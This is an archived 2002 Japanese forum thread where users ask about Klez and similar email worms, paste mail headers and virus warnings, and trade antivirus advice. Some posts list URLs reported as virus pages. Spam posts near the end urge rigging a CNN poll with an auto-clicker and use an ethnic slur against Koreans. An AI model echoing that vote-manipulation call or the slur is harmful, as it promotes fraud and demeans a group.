さあどうぞ。
ほっしゅ!!ほっしゅ!!
質問スレを1つ削る努力をしましょう
Re hello ○○○ darling ○○○は自分のメルアドの頭の奴・・・・。 添付でいつも同じ時間帯に来るよ・・・。強制かかるよ。 これはただのエロ画像売り?それともだれかが自分のマシン狙ってるの?
今日はRe;hello ○○○ darling だったけど昨日は○○○が入ってるだけだったよ。 いつも違うのが来るよ。えーん。
13 :
名無しさん@お腹いっぱい。 :02/06/15 02:05
Received:from smtp.net-keeper.com (EHLO smtp.net-keeper.net) (210.157.11.225) by ** with SMTP
Received:from Pgmub (nttkngw08236.ppp.infoweb.ne.jp [211.133.15.236]) by smtp.net-keeper.net (8.11.2/Oh-2001-01-01) with SMTP id ** for <
[email protected] >
Date**
Message-Id:<
[email protected] >
From:ddhkyoto<
[email protected] >
To:
[email protected] Subject: Re:clientrelations,let's be friends
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=U7rbSz24T559J
添付ファイル
file.html
picacu.scr・・・・・・・Klez
file.txt
AJI0
愛信株式情報のご利用ありがとうございます。 ●今週の注目買銘柄 ●愛信株式情報バックナンバー ●愛信株式情報質問集 ●実践株式情報(有料版) ●メルマガ実践株式情報(無料版) ●本日の安定係数最終結果 ●東証株価情報 ●DJ INDU AVERAGE ●NASDAQ 株価情報 ●安定係数日中足の1週間の推移 売買銘柄一覧(平成14年5月第1週) 低迷する市場に吹き始めた変革の風、加速する産業構造改革の企業統廃合 * 銘柄名をクリックすると、その銘柄の価格情報を表示します +--------+------------------------+----+-------+-----------------------------+ | 会社名| 安値 高値 終値|UP率| 出来高| 406 413 420 427 安定係数| +--------+------------------------+----+-------+-----------------------------+ |三井住友| 522 607 596| 5| 426298| -159 195 268 46 196| | 三菱電|◎ 526 617 613| 6| 101844| -158 -8 40 61|
16 :
名無しさん@お腹いっぱい。 :02/06/16 06:28
17 :
名無しさん@お腹いっぱい。 :02/06/16 09:06
ビジネスと経済 > 企業間取引 (BtoB) > マーケティング、広告 > スポーツ
パシフィック・クリエイティブ - モータースポーツ等のスポーツマーケティング、ラッピングバスの運行。
http://www.pacificcreative.co.jp/ のsasakiさんという人から、ガンガンとウィルスメールが送られてくるよ〜
こんなHPみたこともなかったのに!
なぜ私のメアド知ってんの?
変な会社なのかなあ〜?
19 :
名無しさん@おひさまのよう。 :02/06/16 22:58
>>14 みたいな一覧ってどこで見るの?
うちポスペなんだけど、見る方法ってありますか?
うちにはウイルスメルが累計3000件以上とどいてるYO ピーク時には1日150件以上、いまでも1日5件くらい。 ま、セキュリテーガチガチだから感染しないけどね。 おかげで、見れないサイトも多々あり。 ルータPortルール、ノートンFW、ノートンPort遮断、 プロバ駆除、OE未使用。
22 :
名無しさん@お腹いっぱい。 :02/06/17 00:15
883 名前:☆☆☆危険☆☆☆☆ 投稿日:02/06/17 00:01 ID:8YtNa4et お前ら市ね。 tp://homepage3.nifty.com/girls_and_boys~/ ★★★ウイルス★★★★ これってどんなウイルスなの? 教えてくださいまし。
24 :
名無しさん@おひさまのよう。 :02/06/17 00:26
>>21 無理ですか。むぅ。
最近たくさん来るから突き止めようと思ったんだけど
何かいい方法はありますか?
25 :
名無しさん@お腹いっぱい。 :02/06/17 00:26
>>24 受信メール.ppmを、メモ帳なんかで開く
すると、ずるずるって感じでみえるぜ
>>24 ポスペじゃ無理なんだからメーラー変えろってことぐらい解れよ
知らなかった。
28 :
名無しさん@お腹いっぱい。 :02/06/17 07:17
29 :
名無しさん@お腹いっぱい。 :02/06/17 16:54
同じ人からウィルスがくるのですがもしかして同じ人からではなくその方も 被害者なのかもしれません。でもメアドがわかってるので一応連絡したほうがいいですか?
32 :
名無しさん@お腹いっぱい。 :02/06/17 23:06
>>30 知人でしたらそうしましょう
他人だったら関わりあいになるのを控えましょう
この2,3日に知らない人がウイルス付のメールを送ってくるんですが、 どう対処したらいいのでしょうか?
しつこく送ってくるんですが。 それでもただ捨てるだけですか? 通報とかは効果なし?
家にも来てます。見ず知らずの、メールのやり取りさえしたことないひとから。 htmlとpifの詰め合わせで。だれだ?こいつ。
>>35 正しいメアドがわかるんなら教えてあげればいいさ。
誤爆は無駄だから。
>>36 だから、友達の友達だろうさ。Klezだろ?
なんでもありません
Hi,This is a special new website I expect you would like it. こんな文面で送ってくるんですが。 txtが添付されていてそれがウイルスなんです。 文面からすると嫌がらせじゃないかと。 でも、ウイルスが勝手に文章も作ってウイルスをばら撒くんですか? 嫌がらせじゃないんですか? アドレスを見ると、JCOMのメルアドからですが。
>でも、ウイルスが勝手に文章も作ってウイルスをばら撒くんですか? そうだよ。いまどきのウィルスはみんなそう。勉強しろ。 嫌がらせの可能性は皆無ではないが、嫌がらせでウィルス送ると犯罪だからね。 普通はやらない。
43 :
名無しさん@お腹いっぱい。 :02/06/18 20:44
W杯関連のサイトを開いているのですが、 最近たまに「.jpg」「.bat」の2つのファイルが添付された 謎のメールが舞い込みます。 これってもしかしてウィルスなんでしょうか? 本文はHTMLらしいのですが表示されません。 (gooのフリーメールを使用していて、別窓表示してます) 1回だけ、「.jpg」のファイルを開いてみましたが カメルーン選手の画像があったのみ。 そのあと、一応McAfeeのVirusScanをかけましたが とくに何も検出されませんでした。
ヘッダー例その1(添付ファイル「japanban[1].jpg (8KByte) 」「href.bat (85KByte) 」)
Return-Path: <kvnpi***@mail.ru>
Delivered-To: ***
[email protected] Received: (qmail 1359 invoked from network); 17 Jun 2002 21:01:33 +0900
Received: from unknown (HELO mx1.mail.ru) ([194.67.57.**]) (envelope-sender <kvnpi***@mail.ru>) by localhost.mail.goo.ne.jp (redundant-clusterd qmail-1.03) with SMTP for <***
[email protected] >; 17 Jun 2002 21:01:33 +0900
Received: from [218.226.54.***] (helo=Ctlnrpow) by mx1.mail.ru with smtp (Exim SMTP.1) id 17JvCK-0005Tg-00 for ***
[email protected] ; Mon, 17 Jun 2002 16:01:28 +0400
From: webmaster <******@nikkei.co.jp>
To: ***
[email protected] Subject: Colspan
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=K407258D8dt7l4jA0KmG651T
Message-Id: <
[email protected] >
Date: Mon, 17 Jun 2002 16:01:28 +0400
ヘッダー例その2(添付ファイル「 [2].htm (38KByte) 」「韓国の.bat (85KByte) 」)
Return-Path: <***
[email protected] >
Delivered-To: ***
[email protected] Received: (qmail 6184 invoked from network); 18 Jun 2002 14:30:20 +0900
Received: from unknown (HELO mail533.nifty.com) ([202.248.37.***]) (envelope-sender <***
[email protected] >) by localhost.mail.goo.ne.jp (redundant-clusterd qmail-1.03) with SMTP for <***
[email protected] >; 18 Jun 2002 14:30:20 +0900
Received: from Aewvu by mail533.nifty.com (8.12.3/3.7W-02/25/02) with SMTP id g5I5TdoJ008958 for <***
[email protected] >; Tue, 18 Jun 2002 14:29:39 +0900
Date: Tue, 18 Jun 2002 14:29:39 +0900
Message-Id: <
[email protected] >
From: othergarden <***
[email protected] >
To: ***
[email protected] Subject: Congratulations
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=D31p4sconNePtusZB2A2821k17m4T0J85
>>43 発言の意図が全く理解できません。
何をしたいんですか?
漏れは「意地悪」なヤシじゃないっすけど。
>>46 いや、これってウイルスなのかな、って…
必ず「.jpg」と「.bat」のファイルがセットで添付された
メールが届くけど全然心当たりもないことだし…
ついでに、ヘッダ情報とかもよく判らないから
どっちのアドレスがこれの送信者なのか教えて頂ければと。
すみません、タブレットで窒息して逝ってきます(泣
<丶`Д´> アイゴー!! <丶`Д´> アイゴー!! <丶`Д´> アイゴー!!
>>43 他のアンチウイルスソフトでスキャン、って手もあるかと。
MXで出回ってるHDフォーマット系のは、TrendMicorは対処早かったけど、Symantecはちょい遅くて、警備隊は未対応だったりするから。
例えば、Antidote簡易版。
http://www.vintage-solutions.com/Japanese/Antivirus/Super/ どっちのヘッダ説は、KLEZスレを読んで、過去スレの蓄積を自らの手で紐解いてください。
送信者の設定次第で、何でもありなんだから。
例えば。プロバのメルをメーラーに設定していないで、Yahoo!のメルのPOP設定だけしていると、妙なメルになります。
いずれにしても、batなんてウイルスメルじゃなければ、送信する事はさ、まずありえないファイル形式っす。
クラッシュミーとはどんなものですか?
>>49 ありがとうございます。
でもなんでjpgファイルと必ずセットなんでしょう?
そればっかり10通ほど貰ってますが…
っていうか1枚だけjpgを開いちゃったんですけど、
bat開いてなければ大丈夫ですよね…?
>>51 の43
jpgは、SirCamの時と同じように、相手を油断させるために送るように設計されたような気がします。
最近爆笑したのは、KLEZ感染者から送られたメルに、出会い系サイトのプロフィールのキャッシュが送られてきた事でしょうか。
Batファイルをダブルクリックしなくても、MS01-020の穴が有効ならメルを開いただけで感染しますけど。
日頃からWindows Update(OEやそれに類似した動作をするメーラー)とOffice Update(Outlook ユーザー)をしてれば、問題ないです。
気になるなら、トレンドマイクロのオンラインスキャンやってください。
これはレトロウイルス(アンチウイルスソフトの起動・動作を阻害するウイルス)でも、機能停止しないサービスなんで(誤検出は多いけど)。
http://www.trendmicro.co.jp/hcall/index.asp というか。ダイレクトアクション機能(メル開いただけで感染)は、MS01-020だけとは限らない(ような気がする)んで。
怪しいメルは、開かずに即捨ててしまうようにお勧めします。
Received:from nu.vpo.fenics.or.jp (202.248.63.186) by ** with SMTP; **
Received:from Fqotre (localhost [127.0.0.1]) by nu.vpo.fenics.or.jp (8.9.3/3.7W) with SMTP id ** for <
[email protected] >; **
Date**
Message-Id:<
[email protected] >
From:
[email protected] To:
[email protected] Subject: SOS!!!
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=
-----------------
------------------ Virus Warning Message (on nu)
Found virus WORM_KLEZ.E in file under.pif
The file is deleted.
---------------------------------------------------------
54 :
名無しさん@おひさまのよう。 :02/06/18 23:32
>>25 亀レスですが、ありがとうございました。
ポスペでもちゃんと見れるんですね。
「Return-Path:」のアドレスの持主が感染者ってことで合ってますか?
>>54 横レスですが。
「とあるReturn-path」の持ち主は、本当の感染者の可能性が高い、みたいな。
ポスペのロボットとかが持ち帰るアイテムに、ウイルスが入ってる事件は今時はどうなんでしょか。
Return-Path: <
[email protected] >
Received: from mail01.hs.kddi.ne.jp (mail01.hs.kddi.ne.jp [211.134.181.23])
by ******.**.jp (*.*.2+3.1W/3.7W) with ESMTP id SAA22321
for <****@******.**.jp>; Tue, 18 Jun 2002 18:09:29 +0900 (JST)
Received: from Ocm ([61.115.69.120]) by mail01.hs.kddi.ne.jp with SMTP
id <20020618090857.XPHL1566.mail01@Ocm> for <****@******.**.jp>;
Tue, 18 Jun 2002 18:08:57 +0900
From: voice <
[email protected] >
To: ****@******.**.jp
Subject: Hi,****,meeting notice
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=O54us1VEA31J599V38ge14P9385Jix1L95rH
Message-Id: <20020618090857.XPHL1566.mail01@Ocm>
Date: Tue, 18 Jun 2002 18:08:58 +0900
X-UIDL: 0ddc751bef31510a1313335b77bc65c6
57 :
名無しさん@お腹いっぱい。 :02/06/19 13:02
age
http://members6.tsukaeru.net/sweet/swf/zion.html これ、ウイルスでは?
ダウンロードに失敗した挙句、
PCがおかしくなったぞ!!
かちゅーしゃのログやkageを削除しようとしたぞ。
ドラッグ&ペースト等の通常の操作もままならず、
Alt+Ctrl+Delも受け付けない。
挙句の果てに、ピーと鳴ったままフリーズ状態。
ブラクラを踏んだときに似ていました。
仕方がないので、HDを壊す覚悟でコンセント抜き〜の。
詳しい方おられませんか?
Received:from nu.vpo.fenics.or.jp (202.248.63.186)
by ** with SMTP; 19 Jun 2002 10:41:39 +0900 (JST)
Received:from Lkyy (localhost [127.0.0.1]) by nu.vpo.fenics.or.jp (8.9.3/3.7W)
with SMTP id KAA22390 for <
[email protected] >;
Wed, 19 Jun 2002 10:41:23 +0900 (JST)
Date: Wed, 19 Jun 2002 10:41:23 +0900 (JST)
Message-Id: <
[email protected] >
From:taro<
[email protected] >
To:
[email protected] Subject: PROFITS, BUSINESS INTERRUPTION,
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=OxYbRAYPBvR87ZdC
------------------ Virus Warning Message (on nu)
Found virus WORM_KLEZ.E in file of
The file is deleted.
---------------------------------------------------------
毎日知らない人から(複数)ウイルスが来るんですが。 いちいち捨てても毎日来るんですが、この状況を打破する方法はないんですか?
63 :
名無しさん@お腹いっぱい。 :02/06/19 23:39
そういっている間にも今また送られてきたんですが・・・ いずれもW32.Klez.H@mm なんですが。。。
>>65 そのスレッド見ましたが、未だダイヤルアップの私に、
通信時間がかさむだけの、ウイルスメールはウザイので笑えないんですが。
ちなみにエロサイトとか怪しいサイトでアドレス晒していないんですが。
>>66 この板のKLEZスレに発信者の探り方があるから、直接メルするか発信者のISPに連絡する。
ダウソしないで鯖上で削除するアプリを使う。(俺は知らないが多分存在するだろう)
71 :
名無しさん@お腹いっぱい。 :02/06/20 01:06
>>68-71 ありがとうございます。
KLEZスレの発信者の探り方を参考にISPにメールを出してみました。
73 :
名無しさん@お腹いっぱい。 :02/06/20 13:13
クラッシュミーってなに
はぅ・・・誰からも書き込みがない・・・・・・・・・
>75 削除すりゃいいじゃん。 つかアンタ、自分のメアドは消してるけど、 差出人のメアドモロ出しやで。
はい、わかりました どうもありがとうございました
相手はどこの誰かもわからず、悪意に満ちた人だと思われたので あえて相手のメアドは晒しました、どこのなにものかまで判るのかと 思ったものですから、・・・・ ご迷惑をおかけしました でも、返答があったのでなんか少し安心しました
そのドメインは、プロバではないヨカン
相手はかなりの熟練者なんでしょうか? 又狙われるかもしれませんね、なんか対策あるのでしょうか このアドレスの受信拒否程度で防げますか?
はい、早速見てみます、ありがとうございます
>>82 つーか、ここで聞く前にBadTransがどんなものなのか調べたのか?
それがわかった上で晒してるのか?
>>85 自動的に配信されたメールの可能性があるから
相手には悪意などないのでは? と言う意味でしょうか?
87 :
名無しさん@お腹いっぱい。 :02/06/20 15:32
>86 もしかして、見ず知らずの相手から 悪意を持ってわざと送られてきたと思ってるのか((( ;゚Д゚)))ガクガクブルブル
>>87 あ、そうなんですか・・・
メールの送信者も今回の私のように
知らない内に既に被害者になっていて
同時に加害者になっている、ということなんですね
それなら、送信者に対して行きすぎた晒し行為に
なるので、画像は急いで落としておきます
忠告ありがとうございます
今、急いで画像の方は削除しました 本当にいろいろとありがとうございます 知らない事だらけで迷惑かけて申し訳ありません
単純な疑問なんですが、過去 このアドレスで私にメールをくれた人は 二人しかいません、しかし最近事情があって、ある掲示板でアドレスを 晒してしまいました そのアドレスを見た悪意のある第三者から送られて来たウイルスだと思 っていたのですが、それは違う、ということなのでしょうか? 知り合いの二人の内のどちらかがウイルスに感染していて、それが 自動的に私のところにも送られて来た、ということなのかな? すみません、勉強不足で良くわかりません
このアドレス→今回ウイルスが送られてきたアドレス
94 :
名無しさん@お腹いっぱい。 :02/06/20 15:58
>>91 キミがそのアドレスで過去にメールを送った相手の可能性もある。
(相手の受信メールにアドレスが残る)
95 :
名無しさん@お腹いっぱい。 :02/06/20 16:00
>>91 見知らぬ人に送りつけるためにウィルスを保管するヤツはそういないと思う。
>>94 あ!そういう事もあるんですか、良くわかりました
それなら可能性があります
しかし、しばらく使ってなかったアドを久しぶりに使ったら
このような事態になったので、どうしても解せなかったのですが
やはり偶然なんでしょうね、ほんとコワイです
>>95 たしかにそうですよね、私の疑心暗鬼というか
無知のなせるワザでした、ごめんなさい
>>97 自分の知識のなさで他人のアドレスを晒したわけか。
最悪だね。
100 :
名無しさん@お腹いっぱい。 :02/06/20 18:50
バスター2002は「klez」に対応していますか? ポストペット使ってこの間「klez」4通程もらいました。 その後ウイルスと気づきklezを削除しました。 不安になりバスター2002を購入して調べましたが 「感染ファイルは見つかりませんでした」 としか出てこないのですが。逆に不安です。 現在は、プロバイダに有償でウイルスチェック してもらうようにしています。 加入後も何通か来ましたがプロバイダが 削除してくれました。
>>100 定義ファイルの更新はちゃんとやってるの?
購入後即だと、製造時のままの状態なわけで。
102 :
名無しさん@お腹いっぱい。 :02/06/20 19:01
製造時のままです。 そういえば、mailで有償のヴァージョンアップの お知らせみたいのは来てますね。
103 :
名無しさん@お腹いっぱい。 :02/06/20 19:03
↑101さんにです。
>>100 対応していますが。
けどレトロウイルス系の動作をするので、感染後にアンチウイルスソフトの挙動を妨害する可能性があります。
ですんで、感染後にインストールしても、「アンチウイルスソフトがまともに稼動するか?」、これは微妙なものかと思いまする。
こちらでどんぞ。
TrendMicroのオンラインスキャンは誤検出問題で叩かれたけど、とりあえずそういう問題には関わり無いサービスですんで。
http://www.trendmicro.co.jp/hcall/index.asp
>>101 >>104 さん
忙しい中、質問に答えていただき
ありがとうございました。
大変わかりやすくて嬉しい限りです。
>>106 違った。
バスターVSノートンスレだ。
。。。なんだかなあ、マルチだったとしたらだが。
処理できたらよしとして、そのまま使い続けたり しなければいいが。。。
>>110 すみません。
>>111 使いつづけています。
デスクトップとノートパソコン持ってて
ノートのほうはmail専用にして
壁紙以外は、画像その他は何も保存しないようにしました。
でも「klez」は開けませんでしよ。
彼女のアドレスだったんで何かな?と思いまして・・・
113 :
名無しさん@お腹いっぱい。 :02/06/20 20:28
>>112 製品のウィルス定義ファイルをちゃんと更新しろってことだろ。
追加: オンラインで簡単にできるはずだよ。
ポスペって、メールスキャンするときはなんか設定しないといけないんじゃなかった? 違ってたらスマソ。
116 :
名無しさん@お腹いっぱい。 :02/06/20 21:39
↑誰か詳しい方お願いします
>>115 何のアンチウイルス使ってるかによって変わる。
>116 あんた>100さん?
119 :
名無しさん@お腹いっぱい。 :02/06/20 22:49
友人らしき相手からメールが。 件名が「All Rights Reserved.」。本文無し。border.exeという添付ファイルあり。これらのキーワードで検索しても出てこなかった。 何てウイルスでしょうか?
>>119 KLEZなどは、件名や本文や添付ファイル名のランダム性のため、それだけではウイルス名を判別できませんです。
>>119 ウイルススキャンすればそんな質問は(以下略
122 :
名無しさん@お腹いっぱい。 :02/06/20 23:34
postpetとかでもklezに感染すると メール送っちゃうですかね?
ノートン先生最近うんとも寸とも言わなくてちゃんと働いているのか不安なんです(涙) これ見たことありますか?誰か〜(涙)(涙) 一ヶ月前はしょっちゅううるさいこと言ってきたのに…(アタックがどうのとか)
>>125 定義のアップデートをしてないとか言うなよ?
>>122 PostPetが送るんじゃなくて
Klezが勝手に送るんだよ
130 :
名無しさん@お腹いっぱい。 :02/06/21 12:39
ベッカムウイルスって何?
>>131 スレッドがなかったのでとりあえずここに書いてみた。
ありがとう。
>>123 何か超高速でdlされた気がした.......ノートン反応しなかったぞ?!
dlされた物も見つからない?
>>133 0012.zipとかで検索してみれば?なかったらないんだろう。
alg.exeというファイルを利用するゾーンアラームに訊かれたのですが、 このファイルの意味がわかりません。検索しても見つかりませんでした。 ご存知の方教えてください。
○ウイルス名: WORM_YAHA.E (ヤハ) ○危険度:低 ○ウイルス活動: <ワーム活動> Windowsのアドレス帳ファイルとメッセンジャーソフト(MSN Messenger、 Yahoo Pager、ICQ)のコンタクトリストからメールアドレスの情報を取得し、 メールの送信先や本文中で使用される記述用のデータとして使用します。 送信するメールの件名、本文、添付ファイル名は複数の候補からランダムに 選ばれます。添付ファイルは二重拡張子の形で、後ろの拡張子はBATかSCRで す。 添付ファイル名例:"biodata.xls.scr" メール送信にはシステム内で標準に使用されているSMTPサーバの情報を利用 します。情報が取得できなかった場合にはあらかじめ保持している複数の SMTPサーバの情報の中から選択します。 <プロセス停止> 特定の文字列を含むプロセスを強制終了させます。これはウイルス対策製品 の活動停止を狙った活動と考えられます。
これってウイルスでしょうか?? インターネットのページ開いて、次ページボタン押したら(その後パニくってどこかもわからない)インタアーネットエクスプローラーが30くらい開いて、ネットワーク状態を 教える??のも同じくらい開いて・・・。 これってウイルス?? Xpなんですが、ウイルスソフトは何がいいかもわからないし・・・。 これがウイルスかどうかと、何のソフトがいいのか教えてください。 あと、ホットメールで画像を送ろうとしたらウイルスついたのは送れないって・・・。 上の奴と関係あるのでしょうか??
>>138 すぐに回答こないからといって別スレに同じ質問するな、そういうのはマルチといって嫌われている。
有償でサポートやってるわけじゃないんだぞ。
すいません・・・。 かなりあせってるモンで・・・。
141 :
名無しさん@お腹いっぱい。 :02/06/22 21:08
>>140 常時接続か?ブロードバンドならシマンテックのノートンアンチウィルス体験版インストールしろ。
最初の説明ではただのブラクラくさいけど、画像が送れなかったってのが気になる。
オンラインチェックならこのスレにも載ってるし、やってみれば?(Trend Microかシマか)
今、必死こいてダウン中です。 エッジ(32K)だからあと数時間??かかるみたい・・・。 エラーにならなきゃいいけど・・・。 明日また書き込みます・・・。
143 :
名無しさん@お腹いっぱい。 :02/06/22 21:58
>>142 何?電話代高いだろ。そんなことなら、オンラインスキャンで済ませて
明日製品買ってくりゃ良かったのに。オンラインでもかなり検出できるはずだよ。
まあ始めちゃったものは仕方ないけども。それにさ、もし本当にKlezとかに
感染してたら今頃ウィルスメール送りまくってるな。
つなぎ放題なので・・・。 ただ、田舎だからめちゃ遅いんだよな〜。
>>145 今ISDNのフレッツ(常時接続定額なサービスね)がさ、全国規模で過疎地対応するようだから、NTTに問い合わせてみ。
今、ウイルスバスターでスキャン中なんですが、 ノートン先生??とどっちがいいのでしょうか?? 好みでしょうか?? 出来るだけ操作簡単なのを教えてください。 ちょっとスレ違いの気もしますが・・・。
??????? ウイルスバスターでひっかからなかった・・・。 パソコンのファイルには感染しないでフロッピーの画像にのみ (自分のデジカメで写してパソコンに転送した画像) 感染するなんて事があるのでしょうか?? 元々はパソコンから入れたのに・・・。 今はその画像はフロッピー自体をフォーマットして無くなったのですが・・・。 安心してもいいのでしょうか?? それとも体験版には引っかからないウイルスなのでしょうか??
>>148 何をいいたいのか意味不明
まるでウイルスと分かってるファイルをスキャンしているようにしか
思えないのだが
150 :
名無しさん@お腹いっぱい。 :02/06/23 10:03
>>148 たぶん感染していないと思うがちゃんと定義ファイル更新してからもう一回
スキャンしてみ。あ、バスター体験版はできないか。じゃ、オンラインウィルスチェックかな。
ノートンもそう面倒ではないけど重くなるね。他スレ読めば?
>>149 元はホットメールに画像添付しようと思ってやってたら
ウイルスついたメールは送らないってけられたんです・・。
それで夜にあわててソフト探したりして・・・。
わかりにくいっすね俺の文章・・・。
勉強しなおすか・・・。
152 :
名無しさん@お腹いっぱい。 :02/06/23 17:47
誰か知ってる人いますか? 今日僕のメールボックスに謎のメールが2通。 いずれも200kバイト弱だが微妙にサイズが違う。 1つは件名が「Allrights Reserved」、もう一つは「iloveasada」。 恐らくウィルスだと思い、消したのですが、心当たりありますか? ネット上で検索しようにも、引っかからないもので・・・。
154 :
名無しさん@お腹いっぱい。 :02/06/23 17:51
>>153 McAfeeのVirusScanバージョン古いから今の定義ファイル動かないのに・・・。
155 :
名無しさん@お腹いっぱい。 :02/06/23 18:18
>>151 (152&154と同一人物)
Hotmailはウィルス付きメールを受け付けなければ、添付ファイルを送ってもこないはず。
ブラウザから見ても添付ファイルは送られてこないはずよね?
添付ファイル : Cuux.exe (115k) ホットメールでこんなのが添付ファイルとしてついてきました(相手は知らない人、外人っぽい これに心当たり有りますか? 題名は:Tokyo Broadcasting System, Inc. All Rights
157 :
名無しさん@お腹いっぱい。 :02/06/23 19:06
>>156 検索できん・・・。
というか、「Tokyo Broadcasting System」って、「TBS」だぞ。
>>157
今題名を検索してみたらTBSでしたね。。。。w
メール全文張っておきます
差出人 :"Candy Jonson" <*****@hotmail.com>
本文:
From: "Candy Jonson"<
[email protected] >
To:
[email protected] Subject: Tokyo Broadcasting System, Inc. All Rights
Date: Sat, 22 Jun 2002 18:58:39 +0000
差出人と「from」のアドレス違うし・・・・
俺のアドレスと「to」が違います・・・・・
どういうコトですかねえ。。。
161 :
名無しさん@お腹いっぱい。 :02/06/23 19:36
(152) 誰か答えてくれません?
>>161 今時は件名だけでは断言できなかったりします。
159へどうぞ(多分)。
163 :
名無しさん@お腹いっぱい。 :02/06/23 19:47
>>162 じゃあ、とりあえずメールの概要を書けるだけ書きます。(差出元はプライバシーの関係もあるので一部省略)
[iloveasada]
件名:Allrights Reserved
差出元:******@hanmir.com
本文:Allrights Reserved.
[mitsuto]
件名:Darling
差出元:******@pastel.ocn.ne.jp
本文:Darling
だったとおもう。今更削除ファイル見に行きたくもないので。
>>163 ここで誰かに聞くよりも、添付ファイルをDLしてアンチウイルスソフトでチェックした方が早いような気が。
KLEZだったら件名・差出人・本文はランダムやファイルからの抽出文字列なんだし。
165 :
名無しさん@お腹いっぱい。 :02/06/23 21:46
>>164 とりあえず、感染していないようです。下手に触って感染する方が恐いですから・・・。
ありがとうございました。
親戚のパソコンなんですけどウイルスの影響でハードディスクが認識されなく、起動できなくなりました。 誰かこの症状の原因をおしえてもらえませんか? お願いします。
>>166 それだけじゃわからんよ。でもなんでウィルスと断定できるの?
なんか怪しいファイルを実行しなかったか?今、被害者多いぞ!
>>166 起動出来なきゃ再インスコしかない。
綺麗にフォーマットしてOS入れ直してね!
>>166 f5押しながら軌道できなければご臨終です。チーン
172 :
すみません。 :02/06/23 22:44
もしBIOS破壊されていたらメーカー修理しかないという罠。
177 :
すみません。 :02/06/23 22:52
>>173 さん
恥ずかしながら、ニュー速です。
なんかいろいろ見てたら復活むりそうです。
再起動してしまいました。
ハードを認識しないのでfdiskもできません メーカー修理しかないのでしょうか?
起動時にウイルスが原因かあと何か表示されたのですが忘れたけど違ったのでウイルスの方だとおもったのですが
突然ハードが認識されなくなることってあるのでしょうか?
185 :
名無しさん@お腹いっぱい。 :02/06/23 23:36
>182 もしかしてwin起動ディスクで起動したときに表示されたこと? 認識できなければとりあえず表示してくるものだから当てにならないと思われ。 ところで物理的な接続不良など確認してみた? それとハードを認識できていないせい・・と考えたのはどういう理由から? ちょっと情報少ないよ
どんな理由が考えられますか? 状況としてオンラインゲームをしてる時に突然画面が黒くなって装置設定の画面になり どうにもならなくなりました。 教えてください。お願いします。
つーか ハード板かwin板かに逝った方が早いかと思われ・・・
>>186 まずは、そのゲームで同じような状況になった人がいるかを探した方がいいかもしれませんね
接続不良などは、確かめてみたのですが・・・・ 認識しないと思われる理由はfdiskする時ハードがないとでてくるのと scandiskしたら1秒くらいで終了して異常なしとでてきます。 異常だらけなのに異常なしって…
190 :
名無しさん@お腹いっぱい。 :02/06/23 23:49
毎日2〜3通、異なるアドレスからウイルスが届きます。 でも、ヘッダ情報を見ると↓この2行は必ず同じ。 >Received: from ns.*****.co.jp (ns.*****.co.jp [61.***.***.242]) >by mail1.***.ne.jp (8.9.1/***/20000324-***) これって、この会社が踏み台にされているのでしょうか? それともこの会社自体が送ってきているのでしょうか? 教えてくださいm(_ _)m
yahooゲームのオセロなんですけど他には居ないかと思われます。
WinXPのゲームで「インターネットハーツ」をやっている時、たまに 「初級韓国語」を相手にすると「壊れたデータをうけとりました」と ポップアップがでます。奴らへんなことやってるかも。
This is a very nice game This game is my first work. You're the first player. I hope you would like it. なんか添付ファイルでこんなのが来ました。 件名は「A nice game」。 本アドみたいで、フリメではないです。 同じようなの貰った人いますか?
194 :
名無しさん@お腹いっぱい。 :02/06/24 00:06
195 :
名無しさん@お腹いっぱい。 :02/06/24 00:08
>>194 本当ですか!!ありがとうございます。
すぐに削除します!!
とうとうKlezが私にも・・・・・。
Received: from imfep04.kcom.ne.jp (210.174.120.150) by ** with SMTP; **
Received: from Qhhbglmk ([211.125.8.239])
by imfep04.kcom.ne.jp (InterMail vM.4.01.03.00 201-229-121) with SMTP id <
[email protected] >
for <
[email protected] >; **
From:siva-siva<
[email protected] >
To:
[email protected] [email protected] 20020623134639_RSHJ8525_nttkngw03239_ppp_infoweb_ne_jp_KlezE_@imfep04.kcom.ne.jp
Subject: A special nice game
Message-Id:<
[email protected] >
Date**
This is a very nice game
This game is my first work.
You're the first player.
I wish you would enjoy it.
添付ファイル
file.html
demo.exe・・・KlezE
file.txt
honbun・・・貸金庫の新聞記事
200 :
名無しさん@お腹いっぱい。 :02/06/24 00:21
2ちゃんねらーの力が必要です。皆さんおご協力お願いします。
【祭】2CNN投票「韓国が勝ったのはなぜ」2 【祭】
http://corn.2ch.net/test/read.cgi/news/1024835186/l50 1 :国民代表 :02/06/23 21:26 ID:z0dTlU5b
おいお前ら!!投票しろ!!
http://europe.cnn.com/ の右下だ!!圧倒的にチョンにやられているぞ!!
Has S.Korea got to the World Cup semi-finals as a result of:
(訳:韓国がワールドカップ準決勝に進出できたのは:)
Energy and ability (体力と能力によるもの)
Controversial refereeing decisions (審判のひいき)
Controversial refereeing decisionsに投票してくれ!!
連続投票ツール
連打ソフトはこれだよ!【連打くん】
http://www.vector.co.jp/soft/win95/util/se227453.html †せつめい†
指定した間隔でマウスをクリックしてくれるソフト
いわゆる『連打機』みたいな『連打ソフト』だよ。
使い方はとっても簡単で起動したらまず間隔を入力します!
ちなみに『1』と入力した場合約1000分の1秒の間隔でクリック!
1秒間隔でクリックさせたいときは『1000』と入力してね
推奨は『1500〜3000』だよ!
クリックの開始はF10キーで、速打くんがアクティブじゃなくっても
クリックをはすぐに開始するよ。クリックの停止のときはALT
説明はこれだけ。ダウンロードは数秒。動作も軽いよ!
>>195 ありがとうございますm(_ _)m
…うーん。真犯人みたいです。
送り主のns.*****.co.jp は大手レンタルビデオ店のFCを
愛知県内でチェーン展開している会社らしいです。
ここ数週間毎日送ってきます。
あーもう。晒したい(怒)
202 :
名無しさん@お腹いっぱい。 :02/06/24 00:42
2ちゃんねらーの力が必要です。皆さんおご協力お願いします。
【祭】2CNN投票「韓国が勝ったのはなぜ」3【祭】
http://corn.2ch.net/test/read.cgi/news/1024845084/ おいお前ら!!投票してくれ!!
http://europe.cnn.com/ の右下だ!! 圧倒的に韓国の執念にやられているぞ!!
──────────────────────────────
Has S.Korea got to the World Cup semi-finals as a result of:
●訳:韓国がワールドカップ準決勝に進出できたのは:
・Energy and ability (体力と能力によるもの)
・Controversial refereeing decisions (審判のひいき)
